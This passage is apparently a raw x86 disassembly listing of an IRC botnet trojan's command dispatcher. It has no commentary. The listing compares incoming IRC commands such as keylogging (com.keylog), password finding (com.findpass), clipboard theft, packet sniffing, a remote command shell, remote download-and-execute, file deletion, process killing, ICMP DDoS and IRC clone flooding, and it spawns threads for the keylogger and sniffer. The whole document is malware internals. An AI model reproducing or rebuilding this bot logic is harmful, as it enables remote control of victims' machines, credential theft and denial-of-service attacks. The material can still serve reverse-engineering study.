call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412B7D
push edi
push offset aCom_ps ; "com.ps"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412B7D
push edi
push offset aCom_harvest ; "com.harvest"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412B5F
push edi
push offset aCom_key ; "com.key"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412B5F
push edi
push offset aCom_uptime ; "com.uptime"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412ADA
push edi
push offset aCom_up ; "com.up"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412ADA
push edi
push offset aCom_driveinfo ; "com.driveinfo"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412ABD
push edi
push offset aCom_drv ; "com.drv"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412ABD
push edi
push offset aCom_testdlls ; "com.testdlls"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412AA4
push edi
push offset aCom_dll ; "com.dll"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412AA4
push edi
push offset aCom_opencmd ; "com.opencmd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412A38
push edi
push offset aCom_ocmd ; "com.ocmd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412A38
push edi
push offset aCom_ocmd_off ; "com.ocmd.off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40EA40
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_40EA40: ; CODE XREF: sub_40D2E0+1746�j
push edi
push offset aIrc_who ; "irc.who"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40EACC
cmp [ebp+var_8], ebx
jnz short loc_40EA70
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_40EA70: ; CODE XREF: sub_40D2E0+1774�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40EA75: ; CODE XREF: sub_40D2E0+17DB�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_40EA81
mov eax, offset aEmpty ; "<Empty>"
loc_40EA81: ; CODE XREF: sub_40D2E0+179A�j
push eax
push esi
lea eax, [ebp+var_2DC]
push offset aD_S ; "%d. %s"
push eax
call sub_415480
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40EA75
push offset dword_42DC0C
loc_40EAC2: ; CODE XREF: sub_40D2E0+5C58�j
call sub_40A5B3
jmp loc_4133B4
; ---------------------------------------------------------------------------
loc_40EACC: ; CODE XREF: sub_40D2E0+176F�j
push edi
push offset aCom_getclip ; "com.getclip"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129EF
push edi
push offset aCom_gc ; "com.gc"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129EF
push edi
push offset aUtil_flusharp ; "util.flusharp"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129C4
push edi
push offset aUtil_farp ; "util.farp"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129C4
push edi
push offset aUtil_flushdns ; "util.flushdns"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129A0
push edi
push offset aUtil_fdns ; "util.fdns"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4129A0
push edi
push offset aRoot_currentip ; "root.currentip"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412963
push edi
push offset aRoot_cip ; "root.cip"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412963
push edi
push offset aDaemon_rlogi_0 ; "daemon.rlogin.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412812
push edi
push offset aDaemon_rl_on ; "daemon.rl.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412812
push edi
push offset aDaemon_httpd_o ; "daemon.httpd.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41269C
push edi
push offset aDaemon_web_on ; "daemon.web.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41269C
push edi
push offset aDaemon_tftp_on ; "daemon.tftp.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41255B
push edi
push offset aDaemon_tf_on ; "daemon.tf.on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41255B
push edi
push offset aCom_findpass ; "com.findpass"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4124B1
push edi
push offset aCom_fp ; "com.fp"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4124B1
push edi
push offset aScanall ; "scanall"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4121B2
push edi
push offset aSa ; "sa"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4121B2
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40D6A7
push [ebp+arg_8]
push offset aIrc_nick ; "irc.nick"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412196
push [ebp+arg_8]
push offset aIrc_n ; "irc.n"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412196
push [ebp+arg_8]
push offset aIrc_join ; "irc.join"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412173
push [ebp+arg_8]
push offset aIrc_j ; "irc.j"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412173
push [ebp+arg_8]
push offset aIrc_part ; "irc.part"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412157
push [ebp+arg_8]
push offset aIrc_pt ; "irc.pt"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_412157
push [ebp+arg_8]
push offset aIrc_raw ; "irc.raw"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41211D
push [ebp+arg_8]
push offset aIrc_ra ; "irc.ra"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41211D
push [ebp+arg_8]
push offset aThreads_kill ; "threads.kill"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41204B
push [ebp+arg_8]
push offset aThreads_k ; "threads.k"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41204B
push [ebp+arg_8]
push offset aClone_quit ; "clone.quit"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411FA0
push [ebp+arg_8]
push offset aClone_q ; "clone.q"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411FA0
push [ebp+arg_8]
push offset aClone_rndnick ; "clone.rndnick"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F52
push [ebp+arg_8]
push offset aClone_rn ; "clone.rn"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F52
push [ebp+arg_8]
push offset aIrc_prefix ; "irc.prefix"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F3D
push [ebp+arg_8]
push offset aIrc_pr ; "irc.pr"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F3D
push [ebp+arg_8]
push offset aCom_open ; "com.open"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F13
push [ebp+arg_8]
push offset aCom_o ; "com.o"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411F13
push [ebp+arg_8]
push offset aIrc_setserve ; "irc.setserve"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411EFA
push [ebp+arg_8]
push offset aIrc_se ; "irc.se"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411EFA
push [ebp+arg_8]
push offset aIrc_dns ; "irc.dns"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411E68
push [ebp+arg_8]
push offset aIrc_dn ; "irc.dn"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411E68
push [ebp+arg_8]
push offset aCom_killprocna ; "com.killprocname"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411E3C
push [ebp+arg_8]
push offset aCom_kpn ; "com.kpn"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411E3C
push [ebp+arg_8]
push offset aCom_prockillid ; "com.prockillid"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411DE1
push [ebp+arg_8]
push offset aCom_pkid ; "com.pkid"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411DE1
push [ebp+arg_8]
push offset aCom_delete ; "com.delete"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411DA6
push [ebp+arg_8]
push offset aCom_del ; "com.del"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411DA6
push [ebp+arg_8]
push offset aDcc_get ; "dcc.get"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411CBC
push [ebp+arg_8]
push offset aDcc_gt ; "dcc.gt"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411CBC
push [ebp+arg_8]
push offset aCom_filelist ; "com.filelist"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411C9E
push [ebp+arg_8]
push offset aCom_fl ; "com.fl"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411C9E
push [ebp+arg_8]
push offset aIrc_visit ; "irc.visit"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411BBD
push [ebp+arg_8]
push offset aIrc_v ; "irc.v"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411BBD
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411B82
push [ebp+arg_8]
push offset aMirc_cmd ; "mirc.cmd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411B82
push [ebp+arg_8]
push offset aCom_cmd ; "com.cmd"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411B37
push [ebp+arg_8]
push offset aCom_cm ; "com.cm"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411B37
push [ebp+arg_8]
push offset aCom_readfile ; "com.readfile"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411AB1
push [ebp+arg_8]
push offset aCom_rf ; "com.rf"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411AB1
push [ebp+arg_8]
push offset aSniff ; "sniff"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F13A
push edi
push offset aOn ; "on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F105
push 19h
call sub_415174
test eax, eax
pop ecx
jle short loc_40F02F
push offset unk_42D93C
jmp loc_40F1A6
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40D2E0+1D43�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_40F071
mov esi, offset aF_2 ; "#f"
push offset byte_4325D8
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F071
mov esi, [ebp+var_8C]
loc_40F071: ; CODE XREF: sub_40D2E0+1D73�j
; sub_40D2E0+1D89�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_4159FA
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_42D8FC
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 19h
push eax
call sub_414F2C
add esp, 14h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_402688
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_40F0F4
loc_40F0DE: ; CODE XREF: sub_40D2E0+1E12�j
cmp [ebp+var_460], ebx
jnz loc_40F2C5
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_40F0DE
; ---------------------------------------------------------------------------
loc_40F0F4: ; CODE XREF: sub_40D2E0+1DFC�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42D8B0
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_40F105: ; CODE XREF: sub_40D2E0+1D33�j
push edi
push offset aOff ; "off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F2C5
push ebx
push 19h
call sub_415127
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40F133
push eax
push offset unk_42D864
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_40F133: ; CODE XREF: sub_40D2E0+1E46�j
push offset unk_42D82C
jmp short loc_40F1A6
; ---------------------------------------------------------------------------
loc_40F13A: ; CODE XREF: sub_40D2E0+1D1E�j
push [ebp+arg_8]
push offset aCom_keylog ; "com.keylog"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F2EF
push edi
push offset aOn ; "on"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40F1B9
push edi
push offset aFile ; "file"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_40F1B9
push edi
push offset aOff ; "off"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F2C5
push ebx
push 1Bh
call sub_415127
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40F1A1
push eax
push offset unk_42D7CC
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_40F1A1: ; CODE XREF: sub_40D2E0+1EB4�j
push offset unk_42D790
loc_40F1A6: ; CODE XREF: sub_40D2E0+1D4A�j
; sub_40D2E0+1E58�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
jmp loc_40F2C5
; ---------------------------------------------------------------------------
loc_40F1B9: ; CODE XREF: sub_40D2E0+1E80�j
; sub_40D2E0+1E91�j
push 1Bh
call sub_415174
test eax, eax
pop ecx
jle short loc_40F1CC
push offset unk_42D760
jmp short loc_40F1A6
; ---------------------------------------------------------------------------
loc_40F1CC: ; CODE XREF: sub_40D2E0+1EE3�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
push offset aFile ; "file"
mov [ebp+var_468], eax
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F1FB
mov [ebp+var_464], 1
jmp short loc_40F204
; ---------------------------------------------------------------------------
loc_40F1FB: ; CODE XREF: sub_40D2E0+1F0D�j
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
loc_40F204: ; CODE XREF: sub_40D2E0+1F19�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_40F22B
mov esi, offset aF_1 ; "#f"
push offset byte_4325D8
push esi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F22B
mov esi, [ebp+var_8C]
loc_40F22B: ; CODE XREF: sub_40D2E0+1F2D�j
; sub_40D2E0+1F43�j
push esi
lea eax, [ebp+var_4E8]
push 80h
push eax
call sub_4159FA
add esp, 0Ch
lea eax, [ebp+var_2DC]
push offset unk_42D730
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 1Bh
push eax
call sub_414F2C
add esp, 14h
mov [ebp+var_4EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_4023A7
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_40F2AA
loc_40F298: ; CODE XREF: sub_40D2E0+1FC8�j
cmp [ebp+var_460], ebx
jnz short loc_40F2C5
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_40F298
; ---------------------------------------------------------------------------
loc_40F2AA: ; CODE XREF: sub_40D2E0+1FB6�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42D6E4
loc_40F2B6: ; CODE XREF: sub_40D2E0+1E20�j
; sub_40D2E0+1E4E�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
loc_40F2C5: ; CODE XREF: sub_40D2E0+1E04�j
; sub_40D2E0+1E34�j ...
cmp [ebp+var_8], ebx
jnz loc_40DC90
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
jmp loc_40DC90
; ---------------------------------------------------------------------------
loc_40F2EF: ; CODE XREF: sub_40D2E0+1E6B�j
push [ebp+arg_8]
push offset aCom_net ; "com.net"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz loc_40F582
cmp ds:dword_436538, ebx
jz short loc_40F320
cmp ds:dword_436560, ebx
jz short loc_40F320
push offset dword_42D694
jmp loc_40F53C
; ---------------------------------------------------------------------------
loc_40F320: ; CODE XREF: sub_40D2E0+202C�j
; sub_40D2E0+2034�j
cmp [ebp+var_C], ebx
jz loc_40F54A
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_40F348
push eax
push [ebp+var_C]
call sub_415A50
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_40F348: ; CODE XREF: sub_40D2E0+2058�j
push edi
push offset aStart ; "start"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F394
cmp [ebp+arg_18], ebx
jz short loc_40F368
push [ebp+arg_0]
push 3
jmp loc_40F3F2
; ---------------------------------------------------------------------------
loc_40F368: ; CODE XREF: sub_40D2E0+207C�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BE21
add esp, 0Ch
test eax, eax
jz short loc_40F38A
push offset dword_42D658
jmp loc_40F53C
; ---------------------------------------------------------------------------
loc_40F38A: ; CODE XREF: sub_40D2E0+209E�j
push offset dword_42D628
jmp loc_40F53C
; ---------------------------------------------------------------------------
loc_40F394: ; CODE XREF: sub_40D2E0+2077�j
push edi
push offset aStop ; "stop"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3AC
push [ebp+arg_0]
push 4
jmp short loc_40F3F2
; ---------------------------------------------------------------------------
loc_40F3AC: ; CODE XREF: sub_40D2E0+20C3�j
push edi
push offset aPause ; "pause"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3C4
push [ebp+arg_0]
push 5
jmp short loc_40F3F2
; ---------------------------------------------------------------------------
loc_40F3C4: ; CODE XREF: sub_40D2E0+20DB�j
push edi
push offset aContinue ; "continue"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3DC
push [ebp+arg_0]
push 6
jmp short loc_40F3F2
; ---------------------------------------------------------------------------
loc_40F3DC: ; CODE XREF: sub_40D2E0+20F3�j
push edi
push offset aDelete ; "delete"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F3FE
push [ebp+arg_0]
push 1
loc_40F3F2: ; CODE XREF: sub_40D2E0+2083�j
; sub_40D2E0+20CA�j ...
call sub_40BB87
pop ecx
pop ecx
jmp loc_40F519
; ---------------------------------------------------------------------------
loc_40F3FE: ; CODE XREF: sub_40D2E0+210B�j
push edi
push offset aShare ; "share"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F469
cmp [ebp+arg_18], ebx
jz short loc_40F43C
cmp [ebp+var_9C4], bl
jz short loc_40F42F
push ebx
push [ebp+arg_18]
push 1
loc_40F422: ; CODE XREF: sub_40D2E0+215A�j
call sub_40BF5E
add esp, 0Ch
jmp loc_40F519
; ---------------------------------------------------------------------------
loc_40F42F: ; CODE XREF: sub_40D2E0+213A�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
jmp short loc_40F422
; ---------------------------------------------------------------------------
loc_40F43C: ; CODE XREF: sub_40D2E0+2132�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40C154
add esp, 10h
test eax, eax
jz short loc_40F45F
push offset dword_42D5CC
jmp loc_40F53C
; ---------------------------------------------------------------------------
loc_40F45F: ; CODE XREF: sub_40D2E0+2173�j
push offset dword_42D59C
jmp loc_40F53C
; ---------------------------------------------------------------------------
loc_40F469: ; CODE XREF: sub_40D2E0+212D�j
push edi
push offset aUser ; "user"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F4EC
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_40F4C5
cmp [ebp+var_9C4], bl
jz short loc_40F49B
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_40F4B5
; ---------------------------------------------------------------------------
loc_40F49B: ; CODE XREF: sub_40D2E0+21A7�j
push [ebp+var_4]
mov esi, [ebp+esi+var_88]
cmp esi, ebx
push [ebp+var_8C]
push [ebp+arg_4]
jz short loc_40F4BF
push esi
push eax
push ebx
loc_40F4B5: ; CODE XREF: sub_40D2E0+21B9�j
; sub_40D2E0+21E3�j
call sub_40C275
add esp, 18h
jmp short loc_40F519
; ---------------------------------------------------------------------------
loc_40F4BF: ; CODE XREF: sub_40D2E0+21D0�j
push ebx
push eax
push 2
jmp short loc_40F4B5
; ---------------------------------------------------------------------------
loc_40F4C5: ; CODE XREF: sub_40D2E0+219F�j
push ebx
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40C7A5
add esp, 10h
test eax, eax
jz short loc_40F4E5
push offset dword_42D564
jmp short loc_40F53C
; ---------------------------------------------------------------------------
loc_40F4E5: ; CODE XREF: sub_40D2E0+21FC�j
push offset dword_42D538
jmp short loc_40F53C
; ---------------------------------------------------------------------------
loc_40F4EC: ; CODE XREF: sub_40D2E0+2198�j
push edi
push offset aSend ; "send"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F537
cmp [ebp+arg_18], ebx
jz short loc_40F530
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CA59
add esp, 10h
loc_40F519: ; CODE XREF: sub_40D2E0+2119�j
; sub_40D2E0+214A�j ...
push eax
push offset aS_2 ; "%s"
loc_40F51F: ; CODE XREF: sub_40D2E0+4852�j
; sub_40D2E0+4B79�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
loc_40F52B: ; CODE XREF: sub_40D2E0+5703�j
add esp, 0Ch
jmp short loc_40F54A
; ---------------------------------------------------------------------------
loc_40F530: ; CODE XREF: sub_40D2E0+2220�j
push offset dword_42D508
jmp short loc_40F53C
; ---------------------------------------------------------------------------
loc_40F537: ; CODE XREF: sub_40D2E0+221B�j
push offset dword_42D4DC
loc_40F53C: ; CODE XREF: sub_40D2E0+203B�j
; sub_40D2E0+20A5�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
loc_40F54A: ; CODE XREF: sub_40D2E0+2043�j
; sub_40D2E0+224E�j ...
cmp [ebp+var_8], ebx
jnz short loc_40F56B
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_40F56B: ; CODE XREF: sub_40D2E0+226D�j
; sub_40D2E0+4847�j ...
mov esi, [ebp+arg_24]
loc_40F56E: ; CODE XREF: sub_40D2E0+9B3�j
; sub_40D2E0+4B35�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
pop ecx
mov eax, esi
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_40F582: ; CODE XREF: sub_40D2E0+2020�j
push [ebp+arg_8]
push offset aCom_capture ; "com.capture"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41186E
push [ebp+arg_8]
push offset aCom_cap ; "com.cap"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41186E
push [ebp+arg_8]
push offset aIrc_gethost ; "irc.gethost"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411780
push [ebp+arg_8]
push offset aIrc_gh ; "irc.gh"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411780
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40D6A7
push [ebp+arg_8]
push offset aIrc_addalias ; "irc.addalias"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41174E
push [ebp+arg_8]
push offset aIrc_aa ; "irc.aa"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41174E
push [ebp+arg_8]
push offset aIrc_privmsg ; "irc.privmsg"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4116F8
push [ebp+arg_8]
push offset aIrc_pm ; "irc.pm"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4116F8
push [ebp+arg_8]
push offset aIrc_action ; "irc.action"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411692
push [ebp+arg_8]
push offset aIrc_ac ; "irc.ac"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411692
push [ebp+arg_8]
push offset aIrc_cycle ; "irc.cycle"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411629
push [ebp+arg_8]
push offset aIrc_cy ; "irc.cy"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411629
push [ebp+arg_8]
push offset aIrc_mode ; "irc.mode"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4115EF
push [ebp+arg_8]
push offset aIrc_m ; "irc.m"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4115EF
push [ebp+arg_8]
push offset aClone_raw ; "clone.raw"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411581
push [ebp+arg_8]
push offset aClone_ra ; "clone.ra"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411581
push [ebp+arg_8]
push offset aClone_mode ; "clone.mode"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4114FC
push [ebp+arg_8]
push offset aClone_m ; "clone.m"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4114FC
push [ebp+arg_8]
push offset aClone_nick ; "clone.nick"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411490
push [ebp+arg_8]
push offset aClone_ni ; "clone.ni"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411490
push [ebp+arg_8]
push offset aClone_join ; "clone.join"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41146A
push [ebp+arg_8]
push offset aClone_j ; "clone.j"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41146A
push [ebp+arg_8]
push offset aClone_part ; "clone.part"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411407
push [ebp+arg_8]
push offset aClone_p ; "clone.p"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_411407
push [ebp+arg_8]
push offset aIrc_repeat ; "irc.repeat"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41133E
push [ebp+arg_8]
push offset aIrc_rp ; "irc.rp"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41133E
push [ebp+arg_8]
push offset aIrc_delay ; "irc.delay"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4112A1
push [ebp+arg_8]
push offset aIrc_de ; "irc.de"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_4112A1
push [ebp+arg_8]
push offset aDownload_updat ; "download.update"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41111D
push [ebp+arg_8]
push offset aDownload_up ; "download.up"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41111D
push [ebp+arg_8]
push offset aCom_execute ; "com.execute"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41108A
push [ebp+arg_8]
push offset aCom_e ; "com.e"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_41108A
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410F89
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410F89
push [ebp+arg_8]
push offset aCom_rename ; "com.rename"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410F37
push [ebp+arg_8]
push offset aCom_mv ; "com.mv"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410F37
push [ebp+arg_8]
push offset aDdos_icmp ; "ddos.icmp"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410E36
push [ebp+arg_8]
push offset aDdos_ic ; "ddos.ic"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410E36
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40D6A7
push [ebp+arg_8]
push offset aClone_make ; "clone.make"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz loc_410D4B
push [ebp+arg_8]
push offset aClone_start ; "clone.start"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
